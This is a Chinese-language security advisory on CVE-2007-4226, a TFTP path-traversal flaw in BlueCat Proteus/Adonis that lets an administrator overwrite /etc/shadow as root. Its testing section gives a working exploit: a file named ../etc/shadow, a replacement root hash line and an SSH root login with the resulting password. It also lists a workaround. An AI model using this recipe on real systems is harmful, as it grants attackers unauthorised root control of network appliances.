安全研究
安全漏洞
BlueCat Networks Proteus TFTP文件远程权限提升漏洞
发布日期:2007-08-06
更新日期:2007-08-07
受影响系统:Bluecat Networks Proteus 2.0.2.0
Bluecat Networks Adonis 5.0.2.8
描述:
BUGTRAQ ID:
25214
CVE(CAN) ID:
CVE-2007-4226
Proteus是企业级的IP地址管理设备。
Proteus的TFTP服务器实现上存在漏洞,远程攻击者可能利用此漏洞获取服务器的root用户权限。
可以使用Proteus向所管理的Adonis设备上传文件,管理员可以命名TFTP文件,但没有对用户输入(如相对路径)执行数据验证。所上传的文件仅可拷贝到/tftpboot/目录,且文件拷贝是以root用户权限执行的,因此名为../etc/shadow的文件可以覆盖影子口令数据库/etc/shadow。
<*来源:defaultroute
链接:
http://secunia.com/advisories/26354/
http://marc.info/?l=bugtraq&m=118642180732015&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1) 在Proteus配置中创建新的TFTP组
2) 添加TFTP部署角色,指定Adonis设备到组中
3) 在新TFTP组的顶级文件夹,添加名为../etc/shadow的文件并加载包含有以下行的文件:
root:Im0Zgl8tnEq9Y:13637:0:99999:7:::
4) 向Adonis设备部署配置
5) 现在可以口令bluecat以root权限登录到Adonis设备:
$ ssh root@192.168.1.11
root@192.168.1.11's password:
# cat /etc/shadow
root:Im0Zgl8tnEq9Y:13637:0:99999:7:::
注释:这个示例假设启用了SSH,iptable允许TCP/22端口。
建议:
临时解决方法:
* 禁止管理员的TFTP访问。
厂商补丁:
Bluecat Networks
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bluecatnetworks.com/浏览次数:3323
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |